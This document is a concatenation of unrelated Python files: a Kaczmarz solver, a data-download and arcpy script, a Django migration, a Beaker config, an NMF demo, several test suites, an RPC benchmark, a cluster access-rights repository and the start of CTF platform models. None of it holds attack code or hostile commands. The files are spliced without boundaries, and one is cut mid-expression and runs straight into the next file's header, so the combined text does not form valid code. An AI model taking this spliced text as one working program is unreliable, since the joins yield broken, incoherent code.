b[i]/np.sqrt(A_row_squared_norm[i]) # prob_row = A_row_squared_norm/np.sum(A_row_squared_norm) # cum_prob_row = np.zeros(m+1,dtype=np.float64) # cum_prob_row[0] = prob_row[0] # for i in nb.prange(1,m): # cum_prob_row[i] = cum_prob_row[i-1]+prob_row[i-1] # error = norm2(A@x - b) # while(error>tolerance): for k in nb.prange(max_iteration): i = k%m # i = get_random_index(cum_prob_row,np.random.rand(),m) x = x + (b[i] - inner(A[i,:],x.conj()) )*A[i,:] # error = norm2(A@x - b) # print('error = {0}, i = {1}'.format(error,i)) error = norm2(A@x - b) return x,error # @njitParallel def random_kaczmarz(A,b,max_iteration): m = A.shape[0] n = A.shape[1] if m != b.shape[0]: raise Exception("Matrix and vector size missmatch") #set initial condition: x = np.zeros(n,dtype=np.complex128) #computing probability of each row prob_row = np.zeros(m,dtype=np.float64) A_row_squared_norm = np.zeros(m,dtype=np.float64) for i in nb.prange(m): A_row_squared_norm[i] = norm2(A[i,:]) prob_row = A_row_squared_norm/np.sum(A_row_squared_norm) cum_prob_row = np.zeros(m+1,dtype=np.float64) cum_prob_row[0] = prob_row[0] for i in nb.prange(1,m): cum_prob_row[i] = cum_prob_row[i-1]+prob_row[i-1] # error = norm2(A@x - b) # while(error>tolerance): for k in nb.prange(max_iteration): i = get_random_index(cum_prob_row,np.random.rand(),m) x = x + (b[i] - inner(A[i,:],x.conj()) )*A[i,:]/A_row_squared_norm[i] # error = norm2(A@x - b) # print('error = {0}, i = {1}'.format(error,i)) error = norm2(A@x - b) return x,error @njitSerial def get_random_index(cum_prob_row,randNumber,m): i = 0 while cum_prob_row[i]franTarkenton/IntroToJenkins0 """ In this demo: a) Create a virtualenv b) install dependencies c) run script using virtualenv # source data: ag/cap: * https://catalogue.data.gov.bc.ca/dataset/agriculture-capability-mapping * http://www.env.gov.bc.ca/esd/distdata/ecosystems/Soil_Data/AgricultureCapability/AgCap_Map_GDB_20150923.zip soils data: * https://catalogue.data.gov.bc.ca/dataset/soil-mapping-data-packages * https://www.env.gov.bc.ca/esd/distdata/ecosystems/Soil_Data/Soil_Data_Pkgs/SOIL_Map_GDB_20160331.zip """ import os.path import subprocess import requests import constants import logging import zipfile import archook archook.get_arcpy(pro=True) import arcpy LOGGER = logging.getLogger() class DownloadData: def __init__(self, datadir, dryRun=False): self.datadir = datadir self.dryRun = dryRun if not os.path.exists(datadir): LOGGER.info(f"creating the directory: {datadir}") os.makedirs(datadir) def download(self): fname = os.path.join(self.datadir, 'agcap.zip') if not os.path.exists(fname): LOGGER.debug("downloading the ag data") url = constants.AG_DATA_URL r = requests.get(url) open(fname , 'wb').write(r.content) LOGGER.debug("extracting the ag data") with zipfile.ZipFile(fname, 'r') as zip_ref: zip_ref.extractall(self.datadir) fname2 = os.path.join(self.datadir, 'soil.zip') if not os.path.exists(fname2): LOGGER.debug("download the soil data") url = constants.SOIL_URL r = requests.get(url) open(fname2 , 'wb').write(r.content) LOGGER.debug("extracting the soil data") with zipfile.ZipFile(fname2, 'r') as zip_ref: zip_ref.extractall(self.datadir) def createResultant(self): outDir = os.path.join(self.datadir, constants.OUTPUT_GDB) if not os.path.exists(outDir): LOGGER.debug("creating the output FGDB") arcpy.management.CreateFileGDB(self.datadir, constants.OUTPUT_GDB) resultant = os.path.join(self.datadir, constants.OUTPUT_GDB, 'resultant') if not arcpy.Exists(resultant): fcList = self.getFeatureClasses() LOGGER.info("creating a 
resultant...") if not self.dryRun: arcpy.analysis.Union(fcList, resultant) def getFeatureClasses(self): contents = os.listdir(self.datadir) gdbs = [] for f in contents: LOGGER.debug(f"f is: {f}") if os.path.splitext(f)[1].lower() == '.gdb': gdbs.append(f) fcList = [] for gdb in gdbs: curdir = os.path.join(self.datadir, gdb) arcpy.env.workspace = curdir fcs = arcpy.ListFeatureClasses("*") for fc in fcs: fcPath = os.path.normpath(os.path.join(curdir, fc)) fcList.append(fcPath) listString = '\n'.join(fcList) LOGGER.info(f"feature classes: {listString}") return fcList if __name__ == '__main__': loglevel = logging.DEBUG # logging setup LOGGER.setLevel(loglevel) hndlr = logging.StreamHandler() formatter = logging.Formatter( "%(asctime)s - %(name)s - %(levelname)s - %(lineno)d - %(message)s" ) hndlr.setFormatter(formatter) LOGGER.addHandler(hndlr) LOGGER.debug("first test message") dl = DownloadData(constants.DATADIR, dryRun=True) dl.download() dl.createResultant() # -*- coding: utf-8 -*- # Generated by Django 1.11.4 on 2017-08-10 17:23 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('exams', '0003_auto_20170808_1707'), ] operations = [ migrations.RemoveField( model_name='assignment', name='olympiad', ), migrations.AddField( model_name='mockolympiad', name='due_date', field=models.DateField(blank=True, help_text='When the assignment should be due. Leave blank if not active this semester.', null=True), ), ] JohnVillalovos/controller """Configuration for Controller""" from starlette.config import Config config = Config("/etc/beaker/labcontroller.conf") pid_file = "/var/run/beaker-lab-controller/beaker-{service}.pid" # Process pid file. PROXY_PID_FILE = config("BEAKER_PROXY_PID_FILE", default=pid_file.format(service="proxy")) WATCHDOG_PID_FILE = config("BEAKER_WATCHDOG_PID_FILE", default=pid_file.format(service="watchdog")) TRANSFER_PID_FILE = config("BEAKER_TRANSFER_PID_FILE", default=pid_file.format(service="transfer")) PROVISION_PID_FILE = config("BEAKER_PROVISION_PID_FILE", default=pid_file.format(service="provision")) # Location of locally stored netboot files TFTP_ROOT = config("BEAKER_TFTP_ROOT", default="/var/lib/tftpboot") # How long to sleep between polls. SLEEP_TIME = config("BEAKER_POOL_SLEEP_TIME", cast=int, default=20) # Timeout for fetching distro images. IMAGE_FETCH_TIMEOUT = config("BEAKER_IMAGE_FETCH_TIMEOUT", cast=int, default=120) # Number of times to attempt failing power commands. POWER_ATTEMPTS = config("BEAKER_POWER_ATTEMPS", cast=int, default=5) # Location of locally stored job logs CACHEPATH = config("BEAKER_LOCAL_CACHEPATH", default="/var/www/beaker/logs") # Location of system console logs CONSOLE_LOGS = config("BEAKER_CONSOLE_LOGS", default="/var/consoles") # Regex pattern to use to find panics PANIC_REGEX = config( "BEAKER_PANIC_REGEX", default="Kernel panic|Oops[\\s:[]|general protection fault(?! 
ip:)|general protection handler: wrong gs|\\(XEN\\) Panic|kernel BUG at .+:[0-9]+!", ) # Regex pattern which matches OS major names which do not support x86 EFI EFI_EXCLUDED_OSMAJORS_REGEX = config( "BEAKER_EFI_EXCLUDED_OSMAJORS_REGEX", default="RedHatEnterpriseLinux(3|4|Server5|Client5|ServerGrid5)|Fedora1[234567]", ) script/nmf_olivetti.py #!/usr/bin/env python # based on http://scikit-learn.org/stable/auto_examples/decomposition/plot_faces_decomposition.html#sphx-glr-auto-examples-decomposition-plot-faces-decomposition-py # Authors: , , # License: BSD 3 clause import os, os.path import argparse import numpy as np import logging from time import time from numpy.random import RandomState import matplotlib.pyplot as plt from sklearn import decomposition from sklearn.datasets import fetch_olivetti_faces from sklearn.cluster import MiniBatchKMeans import networkx as nx import prmf def main(): parser = argparse.ArgumentParser(description=""" Run NMF following the scikit-learn demo on the Olivetti faces dataset. Prepare AMPL files to solve the same problem. """) parser.add_argument("outdir") args = parser.parse_args() comps_fp = os.path.join(args.outdir, "components.csv") data_image_fp = os.path.join(args.outdir, "olivetti_faces.png") comps_image_fp = os.path.join(args.outdir, "olivetti_comps.png") opt_fp = os.path.join(args.outdir, "optimize_log.txt") ampl_data_fp = os.path.join(args.outdir, "olivetti_data.dat") ampl_params_fp = os.path.join(args.outdir, "olivetti_params.dat") n_row, n_col = 2, 3 n_components = n_row * n_col image_shape = (64, 64) rng = RandomState(0) # 400 (10 people x 40 images) x 4096 (64 x 64 images) dataset = fetch_olivetti_faces(shuffle=True, random_state=rng) faces = dataset.data n_samples, n_features = faces.shape # TODO transpose due to way my AMPL model is written (maybe should be rewritten to keep # canonical obs x features data shape) with open(ampl_data_fp, 'w') as ampl_data_fh: prmf.write_ampl_data(faces.transpose(), ampl_data_fh) with open(ampl_params_fp, 'w') as ampl_params_fh: prmf.write_ampl_params(n_components, ampl_params_fh) # global centering faces_centered = faces - faces.mean(axis=0) # local centering faces_centered -= faces_centered.mean(axis=1).reshape(n_samples, -1) prmf.plot_olivetti_components(plt, faces_centered[:n_components], "First centered Olivetti faces") plt.savefig(data_image_fp) # objective: # 0.5 * ||X - WH||_Fro^2 # + alpha * l1_ratio * ||vec(W)||_1 # + alpha * l1_ratio * ||vec(H)||_1 # + 0.5 * alpha * (1 - l1_ratio) * ||W||_Fro^2 # + 0.5 * alpha * (1 - l1_ratio) * ||H||_Fro^2 name = 'Non-negative components - NMF' estimator = decomposition.NMF(n_components=n_components, init='nndsvda', tol=5e-3) center = False t0 = time() data = faces if center: data = faces_centered print("data shape {}".format(data.shape)) estimator.fit_transform(data) train_time = (time() - t0) print("done in %0.3fs" % train_time) if hasattr(estimator, 'cluster_centers_'): components_ = estimator.cluster_centers_ else: components_ = estimator.components_ # Plot an image representing the pixelwise variance provided by the # estimator e.g its noise_variance_ attribute. The Eigenfaces estimator, # via the PCA decomposition, also provides a scalar noise_variance_ # (the mean of pixelwise variance) that cannot be displayed as an image # so we skip it. 
#if (hasattr(estimator, 'noise_variance_') and # estimator.noise_variance_.ndim > 0): # Skip the Eigenfaces case # plot_gallery("Pixelwise variance", # estimator.noise_variance_.reshape(1, -1), n_col=1, # n_row=1) prmf.plot_olivetti_components(plt, components_[:n_components], '%s - Train time %.1fs' % (name, train_time)) plt.savefig(comps_image_fp) # n_components x n_col np.savetxt(comps_fp, estimator.components_, delimiter=",") # also write components for AMPL # transform comps to n_obs x n_latent Gs = [] comps = estimator.components_.transpose() n_obs, n_latent = comps.shape print("comps.shape:") print(comps.shape) for i in range(n_latent): latent_factor = comps[:,i] G = prmf.vec_to_graph_prim(latent_factor) Gs.append(G) with open(ampl_data_fp, 'a') as ampl_data_fh: # TODO # write_ampl_laplacians(Ls, ampl_data_fh) for i in range(len(Gs)): G = Gs[i] G_path = os.path.join(args.outdir, "manifold_{}.graphml".format(i)) nx.write_graphml(G, G_path) # TODO write to log file with other optimization components opt_fh = open(opt_fp, 'w') opt_fh.write("reconstruction_err_: {}\n".format(estimator.reconstruction_err_)) if __name__ == "__main__": main() """Collection of tests focused on the `data/synthetic.py` module.""" import numpy as np import pytest from deepdow.data.synthetic import sin_single class TestSin: @pytest.mark.parametrize('n_timesteps', [50, 120]) @pytest.mark.parametrize('period_length', [2, 5, 9]) @pytest.mark.parametrize('amplitude', [0.1, 10]) def test_basic(self, n_timesteps, period_length, amplitude): freq = 1 / period_length res = sin_single(n_timesteps, freq=freq, phase=0.4, amplitude=amplitude) assert isinstance(res, np.ndarray) assert res.shape == (n_timesteps,) assert len(np.unique(np.round(res, 5))) == period_length assert np.all(abs(res) <= amplitude) class ChessProtocol(dict): def __init__(self, cmd, obj): dict.__init__(self) self.cmd = cmd self.object = obj examples/benchmark.py # -*- coding: utf-8 -*- import time import sys import argparse sys.path.append('../') from multiprocessing import Process, Value from tornado import ioloop, gen from torpc import RPCServer, RPCClient from example_utils import log_initialize def rpc_server_entry(rpc_address): log_initialize() server = RPCServer(rpc_address) @server.service.register() def sum(x, y): return x + y server.start() ioloop.IOLoop.instance().start() def rpc_client_entry(rpc_address, num_of_loop, time_start, time_stop): log_initialize() rpc_client = RPCClient(rpc_address) run_call_server(rpc_client, num_of_loop, time_start, time_stop) ioloop.IOLoop.instance().start() @gen.coroutine def run_call_server(rpc_client, num_of_loop, time_start, time_stop): # The time of first client process beginning if time_start.value == 0: time_start.value = time.time() for i in range(num_of_loop): # ret = yield gen.with_timeout(time.time() + 10, rpc_client.call("sum", 1, 2)) ret = yield rpc_client.call("sum", 1, 2) # The time of last client process finished time_now = time.time() if time_now > time_stop.value: time_stop.value = time_now ioloop.IOLoop.instance().stop() ARGS = argparse.ArgumentParser(description="ToRPC RPC benchmark.") ARGS.add_argument( '-c', action="store", dest='client', default=1, help='Number of rpc client.') ARGS.add_argument( '-n', action="store", dest='number', default=10000, help='Number of loop for per client.') ARGS.add_argument( '-host', action="store", dest='host', default='127.0.0.1', help='Host name. 
(default 127.0.0.1)') ARGS.add_argument( '-p', action="store", dest='port', default=5000, type=int, help='Port number (default 5000)') ARGS.add_argument( '-u', action="store", dest='unix_path', default=False, help='Use unix domain socket.') if __name__ == '__main__': args = ARGS.parse_args() if ':' in args.host: args.host, port = args.host.split(':', 1) args.port = int(port) if args.unix_path: rpc_address = args.unix_path else: rpc_address = (args.host, args.port) # print(rpc_address) num_of_loop = int(args.number) num_of_client = int(args.client) time_start = Value('d', 0) time_stop = Value('d', 0) sp = Process(target=rpc_server_entry, args=(rpc_address,)) sp.start() client_processes = [] for i in range(num_of_client): cp = Process(target=rpc_client_entry, args=(rpc_address, num_of_loop, time_start, time_stop)) client_processes.append(cp) for cp in client_processes: cp.start() for cp in client_processes: cp.join() total_time_value = time_stop.value - time_start.value print('Throughput: %d [#/sec]' % (num_of_loop * num_of_client / total_time_value)) sp.terminate()import logging from typing import Dict, Iterable, List, Optional import psycopg2 import sqlalchemy as sa from aiopg.sa import connection from models_library.clusters import ( CLUSTER_ADMIN_RIGHTS, CLUSTER_MANAGER_RIGHTS, CLUSTER_NO_RIGHTS, CLUSTER_USER_RIGHTS, Cluster, ClusterAccessRights, ClusterID, ) from models_library.users import UserID from pydantic.types import PositiveInt from simcore_postgres_database.models.cluster_to_groups import cluster_to_groups from simcore_postgres_database.models.clusters import clusters from simcore_postgres_database.models.groups import GroupType, groups, user_to_groups from simcore_postgres_database.models.users import users from sqlalchemy.dialects.postgresql import insert as pg_insert from ....core.errors import ( ClusterAccessForbiddenError, ClusterInvalidOperationError, ClusterNotFoundError, ) from ....models.schemas.clusters import ClusterCreate, ClusterPatch from ....utils.db import to_clusters_db from ._base import BaseRepository logger = logging.getLogger(__name__) async def _clusters_from_cluster_ids( conn: connection.SAConnection, cluster_ids: Iterable[PositiveInt], offset: int = 0, limit: Optional[int] = None, ) -> List[Cluster]: cluster_id_to_cluster: Dict[PositiveInt, Cluster] = {} async for row in conn.execute( sa.select( [ clusters, cluster_to_groups.c.gid, cluster_to_groups.c.read, cluster_to_groups.c.write, cluster_to_groups.c.delete, ] ) .select_from( clusters.join( cluster_to_groups, clusters.c.id == cluster_to_groups.c.cluster_id, ) ) .where(clusters.c.id.in_(cluster_ids)) .offset(offset) .limit(limit) ): cluster_access_rights = { row[cluster_to_groups.c.gid]: ClusterAccessRights( **{ "read": row[cluster_to_groups.c.read], "write": row[cluster_to_groups.c.write], "delete": row[cluster_to_groups.c.delete], } ) } cluster_id = row[clusters.c.id] if cluster_id not in cluster_id_to_cluster: cluster_id_to_cluster[cluster_id] = Cluster( id=cluster_id, name=row[clusters.c.name], description=row[clusters.c.description], type=row[clusters.c.type], owner=row[clusters.c.owner], endpoint=row[clusters.c.endpoint], authentication=row[clusters.c.authentication], thumbnail=row[clusters.c.thumbnail], access_rights=cluster_access_rights, ) else: cluster_id_to_cluster[cluster_id].access_rights.update( cluster_access_rights ) return list(cluster_id_to_cluster.values()) async def _compute_user_access_rights( conn: connection.SAConnection, user_id: UserID, cluster: Cluster ) -> 
ClusterAccessRights: result = await conn.execute( sa.select([user_to_groups.c.gid, groups.c.type]) .where(user_to_groups.c.uid == user_id) .order_by(groups.c.type) .join(groups) ) user_groups = await result.fetchall() # get the primary group first, as it has precedence if primary_group_row := next( filter(lambda ugrp: ugrp[1] == GroupType.PRIMARY, user_groups), None ): if primary_grp_rights := cluster.access_rights.get(primary_group_row.gid): return primary_grp_rights solved_rights = CLUSTER_NO_RIGHTS.dict() for group_row in filter(lambda ugrp: ugrp[1] != GroupType.PRIMARY, user_groups): grp_access = cluster.access_rights.get(group_row.gid, CLUSTER_NO_RIGHTS).dict() for operation in ["read", "write", "delete"]: solved_rights[operation] |= grp_access[operation] return ClusterAccessRights(**solved_rights) class ClustersRepository(BaseRepository): async def create_cluster(self, user_id, new_cluster: ClusterCreate) -> Cluster: async with self.db_engine.acquire() as conn: user_primary_gid = await conn.scalar( sa.select([users.c.primary_gid]).where(users.c.id == user_id) ) new_cluster.owner = user_primary_gid new_cluster_id = await conn.scalar( sa.insert( clusters, values=to_clusters_db(new_cluster, only_update=False) ).returning(clusters.c.id) ) assert new_cluster_id # nosec return await self.get_cluster(user_id, new_cluster_id) async def list_clusters(self, user_id: UserID) -> List[Cluster]: async with self.db_engine.acquire() as conn: result = await conn.execute( sa.select([clusters.c.id], distinct=True) .where( cluster_to_groups.c.gid.in_( # get the groups of the user where he/she has read access sa.select([groups.c.gid]) .where((user_to_groups.c.uid == user_id)) .order_by(groups.c.gid) .select_from(groups.join(user_to_groups)) ) & cluster_to_groups.c.read ) .join(cluster_to_groups) ) cluster_ids = await result.fetchall() return await _clusters_from_cluster_ids(conn, {c.id for c in cluster_ids}) async def get_cluster(self, user_id: UserID, cluster_id: ClusterID) -> Cluster: async with self.db_engine.acquire() as conn: clusters_list = await _clusters_from_cluster_ids(conn, {cluster_id}) if not clusters_list: raise ClusterNotFoundError(cluster_id=cluster_id) the_cluster = clusters_list[0] access_rights = await _compute_user_access_rights( conn, user_id, the_cluster ) logger.debug( "found cluster in DB: %s, with computed %s", f"{the_cluster=}", f"{access_rights=}", ) if not access_rights.read: raise ClusterAccessForbiddenError(cluster_id=cluster_id) return the_cluster async def update_cluster( # pylint: disable=too-many-branches self, user_id: UserID, cluster_id: ClusterID, updated_cluster: ClusterPatch ) -> Cluster: async with self.db_engine.acquire() as conn: clusters_list = await _clusters_from_cluster_ids(conn, {cluster_id}) if len(clusters_list) != 1: raise ClusterNotFoundError(cluster_id=cluster_id) the_cluster = clusters_list[0] this_user_access_rights = await _compute_user_access_rights( conn, user_id, the_cluster ) logger.debug( "found cluster in DB: %s, with computed %s", f"{the_cluster=}", f"{this_user_access_rights=}", ) if not this_user_access_rights.write: raise ClusterAccessForbiddenError(cluster_id=cluster_id) if updated_cluster.owner and updated_cluster.owner != the_cluster.owner: # if the user wants to change the owner, we need more rights here if this_user_access_rights != CLUSTER_ADMIN_RIGHTS: raise ClusterAccessForbiddenError(cluster_id=cluster_id) # ensure the new owner has admin rights, too if not updated_cluster.access_rights: updated_cluster.access_rights = { 
updated_cluster.owner: CLUSTER_ADMIN_RIGHTS } else: updated_cluster.access_rights[ updated_cluster.owner ] = CLUSTER_ADMIN_RIGHTS # resolve access rights changes resolved_access_rights = the_cluster.access_rights if updated_cluster.access_rights: # if the user is a manager he/she may ONLY add/remove users if this_user_access_rights == CLUSTER_MANAGER_RIGHTS: for grp, rights in updated_cluster.access_rights.items(): if grp == the_cluster.owner or rights not in [ CLUSTER_USER_RIGHTS, CLUSTER_NO_RIGHTS, ]: # a manager cannot change the owner abilities or create # managers/admins raise ClusterAccessForbiddenError(cluster_id=cluster_id) resolved_access_rights.update(updated_cluster.access_rights) # ensure the user is not trying to mess around owner admin rights if ( resolved_access_rights.setdefault( the_cluster.owner, CLUSTER_ADMIN_RIGHTS ) != CLUSTER_ADMIN_RIGHTS ): raise ClusterAccessForbiddenError(cluster_id=cluster_id) # ok we can update now try: await conn.execute( sa.update(clusters) .where(clusters.c.id == the_cluster.id) .values(to_clusters_db(updated_cluster, only_update=True)) ) except psycopg2.DatabaseError as e: raise ClusterInvalidOperationError(cluster_id=cluster_id) from e # upsert the rights if updated_cluster.access_rights: for grp, rights in resolved_access_rights.items(): insert_stmt = pg_insert(cluster_to_groups).values( **rights.dict(by_alias=True), gid=grp, cluster_id=the_cluster.id ) on_update_stmt = insert_stmt.on_conflict_do_update( index_elements=[ cluster_to_groups.c.cluster_id, cluster_to_groups.c.gid, ], set_=rights.dict(by_alias=True), ) await conn.execute(on_update_stmt) clusters_list: List[Cluster] = await _clusters_from_cluster_ids( conn, {cluster_id} ) if not clusters_list: raise ClusterNotFoundError(cluster_id=cluster_id) the_cluster = clusters_list[0] return the_cluster async def delete_cluster(self, user_id: UserID, cluster_id: ClusterID) -> None: async with self.db_engine.acquire() as conn: clusters_list = await _clusters_from_cluster_ids(conn, {cluster_id}) if not clusters_list: raise ClusterNotFoundError(cluster_id=cluster_id) the_cluster = clusters_list[0] access_rights = await _compute_user_access_rights( conn, user_id, the_cluster ) logger.debug( "found cluster in DB: %s, with computed %s", f"{the_cluster=}", f"{access_rights=}", ) if not access_rights.delete: raise ClusterAccessForbiddenError(cluster_id=cluster_id) await conn.execute(sa.delete(clusters).where(clusters.c.id == cluster_id)) # Copyright (c) 2021, Google Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without modification, # are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # 3. Neither the name of Google Inc. nor the names of its contributors # may be used to endorse or promote products derived from this software without # specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON # ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """Tests for deepconsensus.models.data_providers.""" import json from typing import Any, Dict, Tuple from absl.testing import absltest from absl.testing import parameterized import numpy as np import tensorflow as tf from deepconsensus.models import data_providers from deepconsensus.models import model_configs from deepconsensus.models import model_utils from deepconsensus.utils import dc_constants from deepconsensus.utils import test_utils def get_test_dataset(inference: bool) -> Tuple[str, Dict[str, Any]]: """Loads inference or training dataset and json summary.""" if inference: dataset_path = 'human_1m/tf_examples/inference/*.tfrecord.gz' summary_json = 'human_1m/tf_examples/summary/summary.inference.json' size_key = 'n_examples_inference' else: dataset_path = 'human_1m/tf_examples/train/*.tfrecord.gz' summary_json = 'human_1m/tf_examples/summary/summary.training.json' size_key = 'n_examples_train' file_pattern = test_utils.deepconsensus_testdata(dataset_path) summary_json_path = test_utils.deepconsensus_testdata(summary_json) summary = json.load(tf.io.gfile.GFile(summary_json_path)) return file_pattern, summary[size_key] class DataProvidersTest(parameterized.TestCase): @parameterized.named_parameters( dict( testcase_name='batch size evenly divides # examples train', num_epochs=1, batch_size=1, inference=False, ), dict( testcase_name='multiple epochs train', num_epochs=5, batch_size=1, inference=False, ), dict( testcase_name='batch size does not evenly divide # examples train', num_epochs=5, batch_size=10, inference=False, ), dict( testcase_name='batch size evenly divides # examples inference', num_epochs=1, batch_size=1, inference=True, ), dict( testcase_name='multiple epochs inference', num_epochs=5, batch_size=1, inference=True, ), dict( testcase_name='batch size does not evenly divide # examples inference', num_epochs=5, batch_size=10, inference=True, ), ) def test_get_dataset(self, num_epochs, batch_size, inference): """Checks that batches are of expected size and all examples yielded.""" # Dataset sizes computed using gqui. Currently, eval set is empty because # the testdata only contains one molecule, which is added to training set # based on end position. file_pattern, dataset_size = get_test_dataset(inference) params = model_configs.get_config('transformer+test') model_utils.modify_params(params) dataset = data_providers.get_dataset( file_pattern=file_pattern, num_epochs=num_epochs, batch_size=batch_size, params=params, drop_remainder=False, inference=inference) total = 0 for subreads, label in dataset.as_numpy_iterator(): # Last batch may contain fewer examples. 
if not inference: self.assertLen(subreads, len(label)) self.assertLessEqual(len(subreads), batch_size) total += len(subreads) self.assertEqual(total, num_epochs * dataset_size) @parameterized.named_parameters( dict( testcase_name='batch size evenly divides # examples train', num_epochs=1, batch_size=1, inference=False, ), dict( testcase_name='multiple epochs train', num_epochs=5, batch_size=1, inference=False, ), dict( testcase_name='batch size does not evenly divide # examples train', num_epochs=5, batch_size=10, inference=False, ), dict( testcase_name='batch size evenly divides # examples inference', num_epochs=1, batch_size=1, inference=True, ), dict( testcase_name='multiple epochs inference', num_epochs=5, batch_size=1, inference=True, ), dict( testcase_name='batch size does not evenly divide # examples inference', num_epochs=5, batch_size=10, inference=True, ), ) def test_get_dataset_with_metadata(self, num_epochs, batch_size, inference): """Checks that batches are of expected size and all examples yielded.""" # Dataset sizes computed using gqui. Currently, eval set is empty because # the testdata only contains one molecule, which is added to training set # based on end position. file_pattern, dataset_size = get_test_dataset(inference) params = model_configs.get_config('transformer+test') model_utils.modify_params(params) dataset = data_providers.get_dataset( file_pattern=file_pattern, num_epochs=num_epochs, batch_size=batch_size, params=params, drop_remainder=False, inference=inference, keep_metadata=True) total = 0 for subreads, label, num_passes in dataset.as_numpy_iterator(): # Last batch may contain fewer examples. if not inference: self.assertLen(subreads, len(label)) self.assertLessEqual(len(subreads), batch_size) # Sanity check the values in the num_passes array. 
self.assertTrue(tf.reduce_all(num_passes <= 20)) self.assertTrue(tf.reduce_all(num_passes > 0)) total += len(subreads) self.assertEqual(total, num_epochs * dataset_size) @parameterized.named_parameters( dict( testcase_name='batch size evenly divides # examples train', num_epochs=1, batch_size=1, inference=False, ), dict( testcase_name='batch size evenly divides # examples inference', num_epochs=1, batch_size=1, inference=True, ), ) def test_get_dataset_with_pw_ip(self, num_epochs, batch_size, inference): """Checks that batches are of expected size and all examples yielded.""" file_pattern, _ = get_test_dataset(inference) params = model_configs.get_config('transformer_learn_values+test') model_utils.modify_params(params) dataset = data_providers.get_dataset( file_pattern=file_pattern, num_epochs=num_epochs, batch_size=batch_size, params=params, inference=inference) check_not_empty = False for subreads, _ in dataset.as_numpy_iterator(): check_not_empty = True base_indices, pw_indices, ip_indices, strand_indices, ccs_indices, sn_indices = data_providers.get_indices( params.max_passes) base_rows = subreads[:, slice(*base_indices), :, :] pw_rows = subreads[:, slice(*pw_indices), :, :] ip_rows = subreads[:, slice(*ip_indices), :, :] strand_rows = subreads[:, slice(*strand_indices), :, :] ccs_rows = subreads[:, slice(*ccs_indices), :, :] sn_rows = subreads[:, slice(*sn_indices), :, :] self.assertNotEmpty(base_rows) self.assertNotEmpty(pw_rows) self.assertNotEmpty(ip_rows) self.assertNotEmpty(strand_rows) self.assertNotEmpty(ccs_rows) self.assertNotEmpty(sn_rows) self.assertTrue(np.all(base_rows < params.vocab_size)) self.assertTrue(np.all(ip_rows <= dc_constants.IP_MAX)) self.assertTrue(np.all(pw_rows <= dc_constants.PW_MAX)) self.assertTrue(check_not_empty) # Used to fail on empty dataset. @parameterized.named_parameters( dict( testcase_name='limit number of examples train', limit=42, inference=False, ), dict( testcase_name='limit set to size greater than dataset train', limit=int(1e6), inference=False, ), dict( testcase_name='limit number of examples inference', limit=42, inference=True, ), dict( testcase_name='limit set to size greater than dataset inference', limit=int(1e6), inference=True, ), ) def test_dataset_with_limit_option(self, limit, inference): """Checks that batches are of expected size and all examples yielded.""" file_pattern, _ = get_test_dataset(inference) params = model_configs.get_config('transformer_learn_values+test') model_utils.modify_params(params) # Fetch the complete dataset. full_dataset = data_providers.get_dataset( file_pattern=file_pattern, num_epochs=1, batch_size=1, params=params, inference=inference, ) full_dataset_size = sum(1 for record in full_dataset) # Fetch dataset with the limit flag. 
dataset = data_providers.get_dataset( file_pattern=file_pattern, num_epochs=1, batch_size=1, params=params, limit=limit, inference=inference) limit_dataset_size = sum(1 for record in dataset) self.assertEqual(min(limit, full_dataset_size), limit_dataset_size) def test_remove_internal_gaps_and_shift(self): label, expected = (' GGGCGAG ACATA ACATA ATA ATA ', 'GGGCGAGACATAACATAATAATA ') label = [float(dc_constants.VOCAB.index(x)) for x in label] label = tf.expand_dims(tf.constant(label), axis=0) shifted = data_providers.remove_internal_gaps_and_shift(label) result = ''.join([dc_constants.VOCAB[int(x)] for x in shifted]) self.assertEqual(result, expected) if __name__ == '__main__': absltest.main() ldecoster/Plateforme-CTF0 import datetime from collections import defaultdict from flask_marshmallow import Marshmallow from flask_sqlalchemy import SQLAlchemy from sqlalchemy.ext.hybrid import hybrid_property from sqlalchemy.orm import column_property, validates db = SQLAlchemy() ma = Marshmallow() def get_class_by_tablename(tablename): """Return class reference mapped to table. https://stackoverflow.com/a/23754464 :param tablename: String with name of table. :return: Class reference or None. """ for c in db.Model._decl_class_registry.values(): if hasattr(c, "__tablename__") and c.__tablename__ == tablename: return c return None class Votes(db.Model): __tablename__ = "votes" id = db.Column(db.Integer, primary_key=True) user_id = db.Column(db.Integer, db.ForeignKey("users.id", ondelete="CASCADE")) challenge_id = db.Column(db.Integer, db.ForeignKey("challenges.id", ondelete="CASCADE")) value = db.Column(db.Boolean, default=False) user = db.relationship("Users", foreign_keys="Votes.user_id", lazy="select") class Badges(db.Model): __tablename__ = "badges" id = db.Column(db.Integer, primary_key=True) description = db.Column(db.Text) name = db.Column(db.String(80)) tag_id = db.Column(db.Integer, db.ForeignKey("tags.id", ondelete="CASCADE"), nullable=False) def __init__(self, *args, **kwargs): super(Badges, self).__init__(**kwargs) class Notifications(db.Model): __tablename__ = "notifications" id = db.Column(db.Integer, primary_key=True) title = db.Column(db.Text) content = db.Column(db.Text) date = db.Column(db.DateTime, default=datetime.datetime.utcnow) user_id = db.Column(db.Integer, db.ForeignKey("users.id")) user = db.relationship("Users", foreign_keys="Notifications.user_id", lazy="select") @property def html(self): from 